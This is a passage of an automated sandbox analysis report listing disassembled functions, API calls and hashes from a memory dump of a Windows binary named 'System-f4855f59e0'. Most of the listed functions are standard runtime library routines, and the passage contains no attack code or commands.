                                                                • Instruction ID: 7962f364fbdd490b4f18c065341998ad02020af3308700e56b0b670ed21a4023
                                                                • Opcode Fuzzy Hash: 0878affc78bd18bd4d18787875569a156cd14996a9b246bc248bbbc5629d56dc
                                                                • Instruction Fuzzy Hash: B6B18D23A0BA86A1EB75DB15944077967E0EF46F84F098436DE4D8B795EE2CEC92C300
                                                                Function 00007FF6A54F776C Relevance: 7.7, APIs: 5, Instructions: 196COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: _set_statfp
                                                                • String ID:
                                                                • API String ID: 1156100317-0
                                                                • Opcode ID: c7fee55b1fe8e37091ef471a5dfb78c4a2ff78bda4d1f9acb92240a7042a8983
                                                                • Instruction ID: 2320fe4ca23f5893b19c46972a66bf632851fd036b4218a16a70b828a4f9ed81
                                                                • Opcode Fuzzy Hash: c7fee55b1fe8e37091ef471a5dfb78c4a2ff78bda4d1f9acb92240a7042a8983
                                                                • Instruction Fuzzy Hash: 6C81F412D0AA464AF276CB3DA84077A7750EF47F94F044231EA5EA69D4DF3DED898B00
                                                                Function 00007FF6A5504660 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: _set_statfp
                                                                • String ID:
                                                                • API String ID: 1156100317-0
                                                                • Opcode ID: e65ba792651367d839098e214d5891407b2dde01c0b567b7a4e043ebbfca8b6f
                                                                • Instruction ID: cc759e82d6cd2faf84947c0e5f3c17c8b07e9a245c651d26fc72ada1a036e302
                                                                • Opcode Fuzzy Hash: e65ba792651367d839098e214d5891407b2dde01c0b567b7a4e043ebbfca8b6f
                                                                • Instruction Fuzzy Hash: 48110A6FE1EE0389F7589169E4523790040AF57F78F594636EB6ECA2DAAE1CEC444300
                                                                Function 00007FF6A54F3B04 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • FlsGetValue.KERNEL32(?,?,?,00007FF6A54E2D57,?,?,00000000,00007FF6A54E2FF2,?,?,?,?,?,00007FF6A54E2F7E), ref: 00007FF6A54F3B23
                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6A54E2D57,?,?,00000000,00007FF6A54E2FF2,?,?,?,?,?,00007FF6A54E2F7E), ref: 00007FF6A54F3B42
                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6A54E2D57,?,?,00000000,00007FF6A54E2FF2,?,?,?,?,?,00007FF6A54E2F7E), ref: 00007FF6A54F3B6A
                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6A54E2D57,?,?,00000000,00007FF6A54E2FF2,?,?,?,?,?,00007FF6A54E2F7E), ref: 00007FF6A54F3B7B
                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6A54E2D57,?,?,00000000,00007FF6A54E2FF2,?,?,?,?,?,00007FF6A54E2F7E), ref: 00007FF6A54F3B8C
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Value
                                                                • String ID:
                                                                • API String ID: 3702945584-0
                                                                • Opcode ID: 00c6fbaa970bde4532dbe88b5cbe365500f69e3f9223cf134e003389b55fd81d
                                                                • Instruction ID: 1cbaf9d03b7094458d7629260ce0ad954a1df7ccd7d2150cb20ee0da3fb3b945
                                                                • Opcode Fuzzy Hash: 00c6fbaa970bde4532dbe88b5cbe365500f69e3f9223cf134e003389b55fd81d
                                                                • Instruction Fuzzy Hash: 3B117C20A0F64241FA5CE7296AA61791242EF87FB0F084734E83DC77D6DE2CEC094700
                                                                Function 00007FF6A54F3998 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Value
                                                                • String ID:
                                                                • API String ID: 3702945584-0
                                                                • Opcode ID: 95840472770fdb9c6052a747c6ac3a5ec5e20f2c31c595646b27a6c3bdd3b62c
                                                                • Instruction ID: 95c8925bcf183ea644998a4a393deb5e6ecae303545fd68ca783311d3c265079
                                                                • Opcode Fuzzy Hash: 95840472770fdb9c6052a747c6ac3a5ec5e20f2c31c595646b27a6c3bdd3b62c
                                                                • Instruction Fuzzy Hash: C111F714E0B24342FA6DE67A68925791245DF87F70F194B38E93ECA2D2DD2CBC494710
                                                                Function 00007FF6A54A3570 Relevance: 7.5, APIs: 5, Instructions: 33memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: CloseHandleHeapProcess$FreeTerminate
                                                                • String ID:
                                                                • API String ID: 1603644941-0
                                                                • Opcode ID: e46810fe6f0cb646d3a61825d66203b2e1f31f7dd631d30bb055e965b888b515
                                                                • Instruction ID: 73a90daff13ebc2906e7d38b83b3fd3e7c1311ec2e5ceca2a7ecbb704a00495b
                                                                • Opcode Fuzzy Hash: e46810fe6f0cb646d3a61825d66203b2e1f31f7dd631d30bb055e965b888b515
                                                                • Instruction Fuzzy Hash: 6A010435929B4181D654DB25E44871963A0FBCAF65F505231E66F837F4CF3CD845C700
                                                                Function 00007FF6A54A3A7C Relevance: 7.5, APIs: 5, Instructions: 31memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: CloseHandleHeapProcess$FreeTerminate
                                                                • String ID:
                                                                • API String ID: 1603644941-0
                                                                • Opcode ID: c998734ac52e21941be4bbbdd5349791fe456c945ddb9cf23040b05087e31767
                                                                • Instruction ID: d9e36e6b3db13c49175e15b3e555da128630f058048de7c88b27a870bd3cbcc6
                                                                • Opcode Fuzzy Hash: c998734ac52e21941be4bbbdd5349791fe456c945ddb9cf23040b05087e31767
                                                                • Instruction Fuzzy Hash: 3C01E82691EA8186E654DB61E45837AA361FFCBF59F400132E64EC26E8DF6CE849C700
                                                                Function 00007FF6A54D4508 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 243COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %$+
                                                                • API String ID: 0-2626897407
                                                                • Opcode ID: 0585d5205dcc34acdb9730a8ed53485f92eadd230b47e5a928e6ae8ed1d0e68a
                                                                • Instruction ID: 62ab08238b242a5d0f1fb0c2bc7b0838fee91fa99be9e5440c8e83de531cb16a
                                                                • Opcode Fuzzy Hash: 0585d5205dcc34acdb9730a8ed53485f92eadd230b47e5a928e6ae8ed1d0e68a
                                                                • Instruction Fuzzy Hash: BDA1BE63B09B8585EB10CBA5E4402ED73A1FB9AB98F444132DE4D57B99DF7CD84AC300
                                                                Function 00007FF6A54E0BB4 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: CallEncodePointerTranslator
                                                                • String ID: MOC$RCC
                                                                • API String ID: 3544855599-2084237596
                                                                • Opcode ID: f04d3499122c71daeb279c149854d81f5e6cc394a52a16fdb6094a55e056053c
                                                                • Instruction ID: f73076c7c7117b35f9c031398fce8fa3fd1f8826742e65494dcda7a5a27845a6
                                                                • Opcode Fuzzy Hash: f04d3499122c71daeb279c149854d81f5e6cc394a52a16fdb6094a55e056053c
                                                                • Instruction Fuzzy Hash: 3C91A173A097818AE710DB65D8806EC7BB0FB46B88F144139EE8D97B55DF38E595CB00
                                                                Function 00007FF6A54DF244 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                • String ID: csm
                                                                • API String ID: 2395640692-1018135373
                                                                • Opcode ID: 2f9cd0233e9e69d1c3b070e3dee42124cfc35ce54e5d401af1a5d189a9220579
                                                                • Instruction ID: 8e4cf1766e943472690853b5e28f5868eacf75b355fb4cf6b68d2fbcf7c917c3
                                                                • Opcode Fuzzy Hash: 2f9cd0233e9e69d1c3b070e3dee42124cfc35ce54e5d401af1a5d189a9220579
                                                                • Instruction Fuzzy Hash: 2C516C32A1AA02AAEB64CA15E444B7C77D1EB56F98F518131EE4A87788DE7DEC41C700
                                                                Function 00007FF6A54E1134 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                • String ID: csm$csm
                                                                • API String ID: 3896166516-3733052814
                                                                • Opcode ID: a86ef434612143075bbdd04d63bf48d03f65813a07eb0900109ee8a7c2088b10
                                                                • Instruction ID: d8718572966050fc533deb3cedaabd228770a89a6f9f3c76ef7335d6661b06c1
                                                                • Opcode Fuzzy Hash: a86ef434612143075bbdd04d63bf48d03f65813a07eb0900109ee8a7c2088b10
                                                                • Instruction Fuzzy Hash: 1D517A32A4A6828AEB64CE1194443A877A0FB57F94F186236DE9DC7B95CF3CEC50C701
                                                                Function 00007FF6A54E0944 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: CallEncodePointerTranslator
                                                                • String ID: MOC$RCC
                                                                • API String ID: 3544855599-2084237596
                                                                • Opcode ID: e156b7965f5a78edd26b9392e9ff10746d28d4ee99f19db6ac8fc00c0fbcd491
                                                                • Instruction ID: 78705a41e328671628bcfa71d8935eb5941811c33f7ee26345c6a8d705606422
                                                                • Opcode Fuzzy Hash: e156b7965f5a78edd26b9392e9ff10746d28d4ee99f19db6ac8fc00c0fbcd491
                                                                • Instruction Fuzzy Hash: 9E617D32909B8585E760DB15E4407EABBA0FB86B98F044225EF9D43B99DF3CE590CB00
                                                                Function 00007FF6A54CA228 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 96COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Maklocwcsstd::_$Getvals
                                                                • String ID: $+xv$$+xv$+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v
                                                                • API String ID: 1848906033-3573081731
                                                                • Opcode ID: 20d17f0921c237d0de6d91384bc47cf2696aee48f3005f21adfec8ed185b2984
                                                                • Instruction ID: 830715c157c44f9e103d36f04c0c0b248bf0407bed348defbc595a5843000de7
                                                                • Opcode Fuzzy Hash: 20d17f0921c237d0de6d91384bc47cf2696aee48f3005f21adfec8ed185b2984
                                                                • Instruction Fuzzy Hash: 9C418E72A09B918BE764CB26D09036E7BB1FB96B41F054225DB8A83E52DF28F855C740
                                                                Function 00007FF6A54CA4FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Maklocstr
                                                                • String ID: false$true
                                                                • API String ID: 2987148671-2658103896
                                                                • Opcode ID: b7d1604d96d86383e41236cad14531fac3b77cce468fc734a9d049e5f0c58e54
                                                                • Instruction ID: 02780b287b29d61de92f6d5cac7cb7bfa34cfcb9cff59f5426bf5e16a24d3beb
                                                                • Opcode Fuzzy Hash: b7d1604d96d86383e41236cad14531fac3b77cce468fc734a9d049e5f0c58e54
                                                                • Instruction Fuzzy Hash: 22416823B19B8599E710DF70E4401ED33B0FB99B88B414126EE4D67A5AEF38D9A5C384
                                                                Function 00007FF6A54B3C10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00007FF6A54B4888: QueryPerformanceFrequency.KERNEL32(?,?,?,?,00007FF6A54B3C21), ref: 00007FF6A54B489D
                                                                  • Part of subcall function 00007FF6A54B486C: QueryPerformanceCounter.KERNEL32(?,?,?,?,00007FF6A54B3C2B), ref: 00007FF6A54B4875
                                                                • _Subatomic.LIBCONCRTD ref: 00007FF6A54B3C7E
                                                                • _Subatomic.LIBCONCRTD ref: 00007FF6A54B3D1A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: PerformanceQuerySubatomic$CounterFrequency
                                                                • String ID: d
                                                                • API String ID: 3831891851-2564639436
                                                                • Opcode ID: 64ebd66bc83ceef4b8d15525a455d3072b0243a7d4ac053826e9364530fc143a
                                                                • Instruction ID: 9048f5e4366cab849f9b85f811c91c0f41b4608b95a50ecbbcecb3c999c304da
                                                                • Opcode Fuzzy Hash: 64ebd66bc83ceef4b8d15525a455d3072b0243a7d4ac053826e9364530fc143a
                                                                • Instruction Fuzzy Hash: C631F43260EB8481DAA0DB1AF48136AB7A5F7C5B94F015136E6CE87B69EF3CD5108B00
                                                                Function 00007FF6A54A25E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: InitializeUninitializeshared_ptr
                                                                • String ID: "
                                                                • API String ID: 4131599277-123907689
                                                                • Opcode ID: efcb042e080e67c259898b0013473d7730a1d8b333d2afaad245a6d2cb1685fd
                                                                • Instruction ID: fe647aa98c8049f2d040eb01b7bffecbab084df49ed9bb140730a1c89c161a55
                                                                • Opcode Fuzzy Hash: efcb042e080e67c259898b0013473d7730a1d8b333d2afaad245a6d2cb1685fd
                                                                • Instruction Fuzzy Hash: 6E31E87651E68186E7A0DB14E45436AB7A0EB86B94F502036FB8A87B68DF7CD844CB00
                                                                Function 00007FF6A54F84D0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                • String ID:
                                                                • API String ID: 2718003287-0
                                                                • Opcode ID: 211312053549f8ee8b16daa413eb884fc66a327672e7ef1e31147716bce4d710
                                                                • Instruction ID: 703dfccb5feaf7b7778978f50262407520900c1486757605e19c862eceb7d2c1
                                                                • Opcode Fuzzy Hash: 211312053549f8ee8b16daa413eb884fc66a327672e7ef1e31147716bce4d710
                                                                • Instruction Fuzzy Hash: A1D1F432B09A819AE711CF79D4406AC37B1FB46F98F144236DE5D9BB99DE38D91AC300
                                                                Function 00007FF6A54F8DF8 Relevance: 6.2, APIs: 4, Instructions: 218COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6A54F8DE3), ref: 00007FF6A54F8F14
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6A54F8DE3), ref: 00007FF6A54F8F9F
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: ConsoleErrorLastMode
                                                                • String ID:
                                                                • API String ID: 953036326-0
                                                                • Opcode ID: f1375f970a76da0d44942091db7df71d344221770975c47f3dfdc3c3d97817d0
                                                                • Instruction ID: 06502282e75aa5d0cf2225d4172d872b7454a26103d1f6a8c732176ce1a0b10b
                                                                • Opcode Fuzzy Hash: f1375f970a76da0d44942091db7df71d344221770975c47f3dfdc3c3d97817d0
                                                                • Instruction Fuzzy Hash: 0A91B672B1965299FB50CF6994802BD3BA0EF46F88F544139DE0EDBA95DF38D889C310
                                                                Function 00007FF6A54AC6B0 Relevance: 6.2, APIs: 4, Instructions: 203COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF6A54AC6D2
                                                                • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF6A54AC87D
                                                                • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF6A54AC892
                                                                  • Part of subcall function 00007FF6A54B3960: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF6A54B396E
                                                                  • Part of subcall function 00007FF6A54B3960: _Max_value.LIBCPMTD ref: 00007FF6A54B3993
                                                                  • Part of subcall function 00007FF6A54B3960: _Min_value.LIBCPMTD ref: 00007FF6A54B39C1
                                                                • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF6A54AC9C7
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
